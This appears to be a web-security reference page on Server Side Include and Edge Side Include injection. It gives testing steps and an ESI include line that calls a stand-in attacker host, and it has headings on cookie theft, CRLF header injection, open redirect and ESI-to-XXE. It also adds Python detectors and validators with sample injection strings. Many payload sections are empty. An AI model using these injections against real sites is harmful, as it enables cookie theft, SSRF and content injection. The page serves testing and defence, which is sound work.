Server Side Inclusion/Edge Side Inclusion Injection
Server Side Inclusion Basic Information
(Introduction taken from the Apache docs)
SSI (Server Side Includes) are directives that are placed in HTML pages and evaluated on the server while the pages are being served. They let you add dynamically generated content to an existing HTML page without having to serve the entire page via a CGI program or another dynamic technology. For example, you might place a directive into an existing HTML page, such as:
<!--#echo var="DATE_LOCAL" -->
And, when the page is served, this fragment will be evaluated and replaced with its value:
Jumanne, 15-Jan-2013 19:28:54 EST
The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static and how much needs to be recomputed every time the page is served. SSI is a great way to add small pieces of information, such as the current time shown above. But if a majority of your page is being generated at the time it is served, you need to look for some other solution.
You can assume the presence of SSI if the web application uses files with the extensions **.shtml**, **.shtm** or **.stm**, but that is not always the case.
A typical SSI expression has the following format:
Check
To check for Server-Side Inclusion (SSI) and Edge-Side Inclusion (ESI) injection vulnerabilities, you can follow these steps:
Identify the target: Determine the target website or application that you want to test for SSI or ESI injection vulnerabilities.
Inspect the source code: Analyze the source code of the target application to identify any potential SSI or ESI injection points. Look for server-side scripting languages like PHP, ASP, or JSP, as they are commonly used alongside SSI or ESI.
Test for SSI injection: Inject SSI directives into user-controllable input fields, such as URL parameters or form inputs, to see whether the server processes them. Use SSI directives like
<!--#include virtual="file.txt" -->
to include external files or execute commands.
Test for ESI injection: Inject ESI directives into user-controllable input fields, such as URL parameters or form inputs, to see whether the server processes them. Use ESI directives like
<esi:include src="http://attacker.com/malicious.xml" />
to include external content or execute commands.
Observe the response: Analyze the server's response to determine whether the injected SSI or ESI directives were executed, or whether any error messages or unusual behavior occur.
Exploit the vulnerability: If the SSI or ESI injection is successful, try to exploit the vulnerability further by including sensitive files, executing commands, or accessing restricted areas of the application.
Report and mitigate: Document your findings and report them to the appropriate parties. Provide recommendations on how to mitigate the SSI or ESI injection vulnerabilities, such as input validation and output encoding.
By following these steps, you can effectively test for and exploit Server-Side Inclusion and Edge-Side Inclusion injection vulnerabilities in web applications.
Edge Side Inclusion
There is a problem with caching information or dynamic applications, because part of the content may have changed by the next time the content is retrieved. This is what ESI is used for: ESI tags mark the dynamic content that needs to be generated before the cached version is sent. If an attacker is able to inject an ESI tag inside the cached content, then he may be able to inject arbitrary content into the document before it is sent to the users.
ESI Detection
The following header in a response from the server means that the server is using ESI:
If you can't find this header, the server might be using ESI anyway. A blind exploitation approach can also be used, as the request should arrive at the attacker's server:
ESI Exploitation
GoSecure created a table to understand the possible attacks we can try against different ESI-capable software, depending on the supported functionality:
- Includes: Supports the <esi:includes> directive
- Vars: Supports the <esi:vars> directive. Useful for bypassing XSS filters
- Cookie: Document cookies are accessible to the ESI engine
- Upstream Headers Required: Surrogate applications will not process ESI statements unless the upstream application provides the headers
- Host Allowlist: In this case, ESI includes are only possible from allowed server hosts, making SSRF, for example, only possible against those hosts
| Software | Includes | Vars | Cookies | Upstream Headers Required | Host Allowlist |
| --- | --- | --- | --- | --- | --- |
| Squid3 | Yes | Yes | Yes | Yes | No |
| Varnish Cache | Yes | No | No | Yes | Yes |
| Fastly | Yes | No | No | No | Yes |
| Akamai ESI Test Server (ETS) | Yes | Yes | Yes | No | No |
| NodeJS esi | Yes | Yes | Yes | No | No |
| NodeJS nodesi | Yes | No | No | No | Optional |
XSS
The following ESI directive will load an arbitrary file inside the server's response
Bypass client XSS protection
Description:
Some web applications implement client-side XSS protection mechanisms to prevent the execution of malicious scripts in the browser. These protections are usually implemented using Content Security Policy (CSP) headers or JavaScript libraries like DOMPurify.
However, it is possible to bypass these client-side XSS protections by finding and exploiting vulnerabilities in the server-side code. This can be done by injecting malicious code that will be executed on the server and then reflected back to the client.
Exploitation:
To bypass client XSS protection, you can try the following techniques:
Server-Side Inclusion (SSI) Injection: If the web application uses Server-Side Includes (SSI) to dynamically include content, you can try injecting malicious code into the included file. This code will be executed on the server and then reflected back to the client, bypassing the client-side XSS protection.
Edge-Side Includes (ESI) Injection: If the web application uses Edge-Side Includes (ESI) to include content from different sources, you can try injecting malicious code into the included content. This code will be executed on the server and then reflected back to the client, bypassing the client-side XSS protection.
Prevention:
To prevent bypassing client XSS protection, you should:
Implement server-side input validation and sanitization to prevent injection attacks.
Use a web application firewall (WAF) to detect and block malicious requests.
Regularly update and patch the server-side code to fix any vulnerabilities that could be exploited.
Educate developers about secure coding practices and the risks associated with XSS attacks.
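The check procedure above (inject a directive, observe the response) and the prevention advice in this section (server-side validation, output encoding) can both be exercised with the following Python example. It is added here and is not code from the original page or from any tool the page names. The access-log lines, IP addresses and the `example.invalid` host are constructed; the SSI command names come from Apache's mod_include documentation and the tag names from the ESI 1.0 specification.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# SSI directives as documented by Apache (mod_include) and ESI 1.0 tags.
# Matching is done on decoded input, before it is stored or rendered.
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(include|exec|echo|set|config|printenv|fsize|flastmod|if|elif|else|endif)\b",
    re.IGNORECASE,
)
ESI_DIRECTIVE = re.compile(
    r"<\s*esi:(include|inline|vars|remove|try|attempt|except|choose|when|otherwise|comment)\b",
    re.IGNORECASE,
)


def classify_input(value: str) -> list[str]:
    """Return the directive families ('ssi', 'esi') found in one user-supplied value."""
    found = []
    if SSI_DIRECTIVE.search(value):
        found.append("ssi")
    if ESI_DIRECTIVE.search(value):
        found.append("esi")
    return found


def neutralise(value: str) -> str:
    """HTML-encode a value before it is embedded in a page. '<' becomes '&lt;',
    so neither '<!--#' nor '<esi:' survives as markup for a downstream parser."""
    return html.escape(value, quote=True)


def judge_reflection(body: str, canary: str) -> str:
    """Classify how a page handled a harmless SSI canary (the DATE_LOCAL echo from
    the Apache docs) that was submitted as input and should have been echoed back."""
    if neutralise(canary) in body:
        return "escaped"          # rendered as text: safe
    if canary in body:
        return "reflected-raw"    # unescaped markup reaches the client and any SSI/ESI layer in front of it
    return "missing"              # the canary vanished: a parser may have evaluated it, so inspect manually


# Constructed Apache-style access log lines (not taken from a real server).
# The third line carries a double-encoded ESI tag.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [15/Jan/2013:19:28:54 -0500] "GET /search?q=shoes HTTP/1.1" 200 512
203.0.113.9 - - [15/Jan/2013:19:29:10 -0500] "GET /search?q=%3C!--%23echo%20var%3D%22DATE_LOCAL%22%20--%3E HTTP/1.1" 200 640
198.51.100.7 - - [15/Jan/2013:19:30:02 -0500] "GET /profile?name=%253Cesi:include%2520src%3D%22http://example.invalid/x%22/%253E HTTP/1.1" 200 700
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)


def scan_access_log(log_text: str) -> list[dict]:
    """Flag requests whose query parameters carry SSI/ESI directives. Values are
    decoded one extra time so that double-encoded payloads are seen as well."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for key, once_decoded in parse_qsl(query, keep_blank_values=True):
            families = classify_input(unquote(once_decoded))
            if families:
                alerts.append({"ip": m.group("ip"), "param": key, "families": families})
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_ACCESS_LOG):
        print(alert)
    canary = '<!--#echo var="DATE_LOCAL" -->'
    print(judge_reflection("<p>You searched for: " + neutralise(canary) + "</p>", canary))
```

The scanner only looks at query strings; the same `classify_input` call belongs on form bodies and on any header that is later written into a page. Encoding at output time (`neutralise`) is the control that actually removes the risk; the detector is there so that attempts are visible in monitoring.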
Steal Cookie
Steal cookie remotely
Steal an HTTP_ONLY cookie with XSS by reflecting it in the response:
Private Local File
Do not confuse this with "Local File Inclusion":
CRLF
CRLF (Carriage Return Line Feed) is a special character sequence that represents the end of a line in various operating systems, including Windows. It consists of two characters: a carriage return (CR) and a line feed (LF).
In the context of web security, CRLF injection refers to a type of attack where an attacker injects CRLF characters into user input fields or HTTP headers to manipulate the behavior of the web application or server. This can lead to various security vulnerabilities, such as HTTP response splitting, session hijacking, or server-side request forgery.
To prevent CRLF injection attacks, it is important to properly validate and sanitize user input, especially when it is used in HTTP headers or other sensitive parts of the application. Additionally, web developers should ensure that the application's response headers are correctly encoded to prevent any unintended interpretation of CRLF characters.
By understanding CRLF injection and implementing appropriate security measures, web applications can be better protected against this type of attack.
Open Redirect
The following will add a Location header to the response
Add Header
Add a header to the forced request
Add a header to the response (useful to bypass "Content-Type: text/json" in a response with XSS)
CRLF in Add header (CVE-2019-2438)
Description
There is a CRLF (Carriage Return Line Feed) flaw in the add-header functionality of the site. This flaw can allow content-injection attacks against the page header. Such an attack can have serious consequences such as leakage of sensitive information, execution of unauthorised JavaScript code, or even server takeover.
Verification
To confirm the presence of this flaw, you can try to add CRLF characters (%0d%0a) to the header of an HTTP request. If those characters appear in the header of the received page, then a CRLF attack is likely possible.
Attacks
CRLF attacks can be carried out by injecting unauthorised content into the page header. This can lead to various outcomes such as leakage of sensitive information, execution of unauthorised JavaScript code, or even server takeover.
Mitigation
To prevent CRLF attacks, it is important to thoroughly validate whatever is inserted into page headers. Make sure to strip CRLF characters from input data before it is reflected on the page. Also, use security tools such as a WAF (Web Application Firewall) to block CRLF attacks.
Akamai debug
This will send debug information included in the response:
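The following Python example is an added illustration for this section and for the CRLF section above; it is not code from the original page or from the CVE-2019-2438 advisory. It places the weak header-serialisation pattern (values written verbatim) beside a validating one that percent-decodes first and refuses CR, LF and NUL. The header name `X-Injected` and the redirect targets are constructed for the demonstration.

```python
import re
from urllib.parse import unquote


class HeaderInjection(ValueError):
    """Raised when a would-be header value could split the response."""


# CR, LF and NUL must never reach a header line. CR or LF alone is enough:
# several HTTP parsers accept a bare LF as a line terminator.
FORBIDDEN = re.compile(r"[\r\n\x00]")


def safe_header_value(raw: str) -> str:
    """Percent-decode the way a server would, then refuse line terminators.
    Returning the decoded value keeps the caller from decoding a second time."""
    value = unquote(raw)
    if FORBIDDEN.search(value):
        raise HeaderInjection("line terminator or NUL in header value")
    return value


def build_response_head(status: str, headers: dict[str, str]) -> bytes:
    """Serialise a status line plus headers exactly as given. This is the weak
    pattern: it trusts every value, so a value containing CRLF becomes a new header."""
    lines = [f"HTTP/1.1 {status}"] + [f"{name}: {value}" for name, value in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def header_names(head: bytes) -> list[str]:
    """Parse the header block back and list the header names a client would see."""
    block = head.decode().split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0] for line in block.split("\r\n")[1:]]


def is_rejected(raw: str) -> bool:
    """True if safe_header_value refuses the value."""
    try:
        safe_header_value(raw)
    except HeaderInjection:
        return True
    return False


# Constructed inputs: a normal redirect target and one carrying %0d%0a.
CLEAN_TARGET = "/home"
SPLIT_TARGET = "/home%0d%0aX-Injected:%201"

if __name__ == "__main__":
    weak = build_response_head("302 Found", {"Location": unquote(SPLIT_TARGET)})
    print(header_names(weak))          # the client sees a second header it was never meant to get
    print(is_rejected(SPLIT_TARGET))   # the validating path refuses the same input
    print(header_names(build_response_head("302 Found", {"Location": safe_header_value(CLEAN_TARGET)})))
```

In production the validation belongs in the framework's header-setting API rather than in every call site; most frameworks already raise on CR/LF in header values, and the check here shows what that guard has to cover, including single LF and values that only contain the terminator after decoding.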
ESI + XSLT = XXE
By providing the value xslt to the dca parameter, it is possible to include XSLT-based ESI (eXtensible Stylesheet Language Transformations). The inclusion causes the HTTP surrogate to retrieve the XML and XSLT files, where the XSLT filters the XML. Such XML files can be used for XML External Entity (XXE) attacks, allowing attackers to perform SSRF attacks. However, the usefulness of this approach is limited, since ESI already serves as an SSRF vector. Due to the lack of support in the Xalan library, external DTDs are not processed, which prevents local file extraction.
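As an added example (not from the original page, from GoSecure's research or from Akamai's implementation), the following Python pre-screen rejects XML that declares a DTD or entity before it reaches any transformation step. Whether the surrogate's Xalan build processes external DTDs is outside the application owner's control; screening the XML the application itself serves into an XSLT pipeline is not. The sample documents and the `file:///PLACEHOLDER/secret` path are constructed.

```python
import re
import xml.etree.ElementTree as ET


class UnsafeXML(ValueError):
    """Raised for documents that declare a DTD or entities."""


# Any DOCTYPE or ENTITY declaration is refused outright. Without a DTD there is
# no place for an external entity to be defined, so the XXE vector is gone
# regardless of how the downstream XSLT engine treats external DTDs.
DTD_MARKER = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Pre-screen the raw bytes, then parse with the standard library."""
    if DTD_MARKER.search(data):
        raise UnsafeXML("DTD or entity declaration in untrusted XML")
    return ET.fromstring(data)


def is_rejected(data: bytes) -> bool:
    """True if the screen refuses the document."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXML:
        return True
    return False


# Constructed samples: a benign fragment and a document of the XXE shape,
# with an external entity pointing at a placeholder path.
BENIGN = b'<?xml version="1.0"?><fragment><title>hello</title></fragment>'
XXE_SHAPED = (b'<?xml version="1.0"?>'
              b'<!DOCTYPE d [<!ENTITY ext SYSTEM "file:///PLACEHOLDER/secret">]>'
              b'<d>&ext;</d>')

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN).tag)   # fragment
    print(is_rejected(XXE_SHAPED))           # True
```

The screen runs on bytes, before decoding, so a declaration hidden behind an unusual encoding declaration is still caught as long as it is ASCII-compatible; documents in UTF-16 should be transcoded to UTF-8 first and then screened.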
XSLT file:
Check the XSLT page:
XSLT Server Side Injection (Extensible Stylesheet Language Transformations)
References
Brute-Force Detection List